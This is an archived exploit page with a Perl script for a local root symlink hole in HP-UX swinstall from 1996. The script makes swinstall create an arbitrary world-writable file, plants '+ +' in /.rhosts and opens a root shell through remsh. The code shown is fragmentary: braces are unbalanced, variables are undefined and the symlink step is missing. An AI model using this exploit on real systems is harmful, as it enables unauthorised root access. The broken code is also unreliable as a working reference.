swinstall symlink exploit

Description: Standard symlink hole
Compromise: root (local)
Vulnerable Systems: HP/UX with vulnerable swinstall, mostly 10.x, some 9.x
Date: 6 October 1996
Notes: See the SOD HP Bug of the Week page



# swinstall is a new utility for super-EZ software installation.
# it also happens to make any file you like, and it will do so
# mode 666... Hooray for it!                  -Salty 8/6/96

# 9.x=/usr/tmp 10.X=/var/tmp... -- not many 9.X's will have swinstall,
# it's not standard, for 9, really.. 10, yes, 9 Mmmm.. There's a version
# of it _for_ 9.x, but it does seem rare..

stat($swinstall) || do {
  print STDERR "I can only work on systems that have swinstall loaded..\n";
  print STDERR "Yours doesn't seem to...\n";

if ($#ARGV<0) {
  } else {

if (-f "$newfile") {
  print STDERR "$newfile exists!\n";
  print STDERR "I can only make files that don't already exist..\n";

open(UNAME,"uname -r|");
$num=sprintf("%05d",$$+3); # two for exec, three for system.
$tmpfile="/var/tmp/AAAa$num" if $uname eq "10";

print "Please wait one moment while I do stuff...\n";
system("/usr/sbin/swinstall -s '\
+ +
' -p bob localhost:/");
if ($newfile eq "/.rhosts") {
  system("remsh localhost -l root ksh -i");
  } else {
  system(">$newfile;ls -l $newfile");

This page is part of Fyodor's exploit world.